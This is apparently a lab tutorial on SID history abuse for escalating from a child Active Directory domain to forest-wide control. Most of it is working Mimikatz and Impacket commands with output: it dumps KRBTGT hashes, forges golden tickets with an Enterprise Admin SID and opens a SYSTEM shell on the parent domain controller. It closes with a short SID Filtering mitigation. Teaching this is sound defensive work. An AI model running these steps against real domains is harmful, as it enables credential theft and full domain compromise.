SID History Abuse

Every user account in a Windows domain has an associated Security Identifier (SID). When a user logs into a domain, their SID value is included in a users access token. This value is used for identity based security decisions.

Active Directory supports a feature called SID History which allows a single user account to have multiple associated SID values. This feature can be used when migrating users from a legacy domain to a new domain, and ensure they can still access resources in both domains.

Manipulating SID history requires domain administrator privileges in a target domain. If an adversary is able to compromise a child domain within a forest, SID history can be manipulated to gain administrative control of a parent domain.

Trust Enumeration

nltest.exe can be used to enumerate domain trusts. In the below output, we can see that a trust exists between bordergate.local (the forest root) and child.bordergate.local, a child domain.

C:\Users\Administrator>nltest /domain_trusts
List of domain trusts:
    0: BORDERGATE bordergate.local (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest )
    1: CHILD child.bordergate.local (NT 5) (Forest: 0) (Primary Domain) (Native)
The command completed successfully

Domain trusts can also be enumerated using PowerShell;

Get-ADTrust -Filter *
Direction               : BiDirectional
DisallowTransivity      : False
DistinguishedName       : CN=bordergate.local,CN=System,DC=child,DC=bordergate,DC=local
ForestTransitive        : False
IntraForest             : True
IsTreeParent            : False
IsTreeRoot              : False
Name                    : bordergate.local
ObjectClass             : trustedDomain
ObjectGUID              : 006fc34d-9cb6-4d0d-a7f8-6cdfe2fb9e33
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source                  : DC=child,DC=bordergate,DC=local
Target                  : bordergate.local
TGTDelegation           : False
TrustAttributes         : 32
TrustedPolicy           :
TrustingPolicy          :
TrustType               : Uplevel
UplevelOnly             : False
UsesAESKeys             : False
UsesRC4Encryption       : False

Exploiting SID History with Windows

Using a combination of PowerView and Mimikatz we can carry out a SID history attack using Windows. The following details need to be gathered;

  • The FQDN’s of the child and parent domains
  • The child and parent domain’s SID values
  • The RC4 or AES hash of the child domain’s KRBTGT
FQDN Extraction with PowerView
PS C:\Users\Administrator\Desktop> . .\PowerView.ps1

PS C:\Users\Administrator\Desktop> Get-NetDomainTrust
SourceName      : child.bordergate.local
TargetName      : bordergate.local
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 27/01/2024 11:03:26
WhenChanged     : 27/01/2024 11:03:26

PS C:\Users\Administrator\Desktop> Get-NetForestDomain
Forest                  : bordergate.local
DomainControllers       : {DC01.bordergate.local}
Children                : {child.bordergate.local}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : DC01.bordergate.local
RidRoleOwner            : DC01.bordergate.local
InfrastructureRoleOwner : DC01.bordergate.local
Name                    : bordergate.local

Forest                  : bordergate.local
DomainControllers       : {CDC01.child.bordergate.local}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : bordergate.local
PdcRoleOwner            : CDC01.child.bordergate.local
RidRoleOwner            : CDC01.child.bordergate.local
InfrastructureRoleOwner : CDC01.child.bordergate.local
Name                    : child.bordergate.local
Determining the Parent and Child Domain SID’s

PowerView’s Get-DomainSID can be used for this purpose.

PS C:\Users\Administrator\Desktop> Get-DomainSID -Domain child.bordergate.local
S-1-5-21-3282285589-3699175333-1759823265
PS C:\Users\Administrator\Desktop> Get-DomainSID -Domain bordergate.local
S-1-5-21-678665010-2561942565-514098031
KRBTGT Extraction with Mimikatz

We can extract the KRBTGT of the child domain using the following Mimikatz one liner.

mimikatz.exe "privilege::debug" "lsadump::dcsync /user:CHILD\krbtgt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /user:CHILD\krbtgt
[DC] 'child.bordergate.local' will be the domain
[DC] 'CDC01.child.bordergate.local' will be the DC server
[DC] 'CHILD\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 27/01/2024 11:04:06
Object Security ID   : S-1-5-21-3282285589-3699175333-1759823265-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: b3a2319d94fe4aeae0f1fd5b017eed82
    ntlm- 0: b3a2319d94fe4aeae0f1fd5b017eed82
    lm  - 0: 572c05076819c0d36b6d2e30b8b7f5b3

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 92aa3fc70fca259306071a788a8c48c2

mimikatz(commandline) # exit
Bye!
Carrying out the Attack

At this point, we have collected the following details;

RequirementValue
Parent domain FQDNbordergate.local
Child domain FQDNchild.bordergate.local
Parent domain SIDS-1-5-21-678665010-2561942565-514098031
Child domain SIDS-1-5-21-3282285589-3699175333-1759823265
Child domain KRBTGT RC4b3a2319d94fe4aeae0f1fd5b017eed82

We will need to know the enterprise administrator SID, but since the RID is a well known value (519) we can just append with to the parent domain SID; S-1-5-21-678665010-2561942565-514098031-519

We then use Mimikatz to generate a golden ticket with the parent domain’s Enterprise Administrator SID as part of it’s SID history.

C:\Users\Administrator\Desktop>dir \\DC01.bordergate.local\C$
Access is denied.

C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:child.bordergate.local /sid:S-1-5-21-3282285589-3699175333-1759823265 /sids:S-1-5-21-678665010-2561942565-514098031-519 /rc4:b3a2319d94fe4aeae0f1fd5b017eed82 /ticket:ticket.kirbi /ptt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:child.bordergate.local /sid:S-1-5-21-3282285589-3699175333-1759823265 /sids:S-1-5-21-678665010-2561942565-514098031-519 /rc4:b3a2319d94fe4aeae0f1fd5b017eed82 /ticket:ticket.kirbi /ptt
User      : Administrator
Domain    : child.bordergate.local (CHILD)
SID       : S-1-5-21-3282285589-3699175333-1759823265
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-678665010-2561942565-514098031-519 ;
ServiceKey: b3a2319d94fe4aeae0f1fd5b017eed82 - rc4_hmac_nt
Lifetime  : 27/01/2024 14:26:25 ; 24/01/2034 14:26:25 ; 24/01/2034 14:26:25
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ child.bordergate.local' successfully submitted for current session

mimikatz(commandline) # exit
Bye!

C:\Users\Administrator\Desktop>dir \\DC01.bordergate.local\C$
 Volume in drive \\DC01.bordergate.local\C$ has no label.
 Volume Serial Number is 2CAB-3D22

 Directory of \\DC01.bordergate.local\C$

08/05/2021  08:20    <DIR>          PerfLogs
27/01/2024  09:30    <DIR>          Program Files
08/05/2021  09:40    <DIR>          Program Files (x86)
27/01/2024  09:23    <DIR>          Users
27/01/2024  13:57    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  40,117,248,000 bytes free


Attacking with Linux

The same attack can also be launched from a Linux system;

Determining the Parent and Child Domain SID’s
└─$ impacket-lookupsid CHILD/Alice:Password1@192.168.1.205 | grep "Domain SID"
[*] Domain SID is: S-1-5-21-678665010-2561942565-514098031
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/forest-trust-tools]
└─$ impacket-lookupsid CHILD/Alice:Password1@192.168.1.240 | grep "Domain SID"
[*] Domain SID is: S-1-5-21-3282285589-3699175333-1759823265

KRBTGT Extraction with Impacket-secretsdump
impacket-secretsdump CHILD/Alice:Password1@192.168.1.240 -just-dc-user CHILD/krbtgt
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b3a2319d94fe4aeae0f1fd5b017eed82:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:dabdbd6e19f848dfc0eadf1f7445e1d1a12eb5ea33de99ec30500fef4ace7a93
krbtgt:aes128-cts-hmac-sha1-96:10270f335d0d6b548e1842ea0e6733c6
krbtgt:des-cbc-md5:0d640e94da8c4915
[*] Cleaning up... 

Carrying out the Attack
┌──(kali㉿kali)-[~]
└─$ impacket-ticketer -nthash b3a2319d94fe4aeae0f1fd5b017eed82  -domain child.bordergate.local -domain-sid S-1-5-21-3282285589-3699175333-1759823265  -extra-sid S-1-5-21-678665010-2561942565-514098031-519  Administrator
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for child.bordergate.local/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in Administrator.ccache
                                                                                                                
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator.ccache
                                                                                                                
┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@CHILD.BORDERGATE.LOCAL

Valid starting     Expires            Service principal
27/01/24 15:02:23  24/01/34 15:02:23  krbtgt/CHILD.BORDERGATE.LOCAL@CHILD.BORDERGATE.LOCAL
        renew until 24/01/34 15:02:23

┌──(kali㉿kali)-[~]
└─$ impacket-psexec CHILD.bordergate.local/Administrator@dc01.bordergate.local -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc01.bordergate.local.....
[*] Found writable share ADMIN$
[*] Uploading file pijDaCeK.exe
[*] Opening SVCManager on dc01.bordergate.local.....
[*] Creating service PYVP on dc01.bordergate.local.....
[*] Starting service PYVP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> 

Note: When using impacket-psexec it’s import to use the Domain FQDN for the user or you will likely receive the following error: “[-] [Errno Connection error (CHILD:88)] [Errno -3] Temporary failure in name resolution”


Automated Exploitation

impacket-raiseChild is an impacket script that can be used to automatically gather the required details and gain command execution on the parent domain controller;

impacket-raiseChild -target-exec 192.168.1.205 child.bordergate.local/alice:'Password1'
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Raising child domain child.bordergate.local
[*] Forest FQDN is: bordergate.local
[*] Raising child.bordergate.local to bordergate.local
[*] bordergate.local Enterprise Admin SID is: S-1-5-21-678665010-2561942565-514098031-519
[*] Getting credentials for child.bordergate.local
child.bordergate.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b3a2319d94fe4aeae0f1fd5b017eed82:::
child.bordergate.local/krbtgt:aes256-cts-hmac-sha1-96s:dabdbd6e19f848dfc0eadf1f7445e1d1a12eb5ea33de99ec30500fef4ace7a93
[*] Getting credentials for bordergate.local
bordergate.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:48aae46c1e41eca204a6aa70a6aedd48:::
bordergate.local/krbtgt:aes256-cts-hmac-sha1-96s:2b52d519771b9b1266342151af0cc8e646d66d4a6baa59c2d443f4445b6acf0f
[*] Target User account name is Administrator
bordergate.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
bordergate.local/Administrator:aes256-cts-hmac-sha1-96s:bb9930dc9a2266e2491cdb468d6eb7441d87053fd483b8ff2473545fc71b3482
[*] Opening PSEXEC shell at DC01.bordergate.local
[*] Requesting shares on DC01.bordergate.local.....
[*] Found writable share ADMIN$
[*] Uploading file qdrQNfow.exe
[*] Opening SVCManager on DC01.bordergate.local.....
[*] Creating service pWac on DC01.bordergate.local.....
[*] Starting service pWac.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
DC01

C:\Windows\system32>whoami
nt authority\system

In Conclusion

Domains are not intended to be a security boundary, and there are numerous other ways to perform escalation from a child domain. Enabling a feature called “SID Filtering” would partly mitigate this attack. This prevents SID values from other domains being used.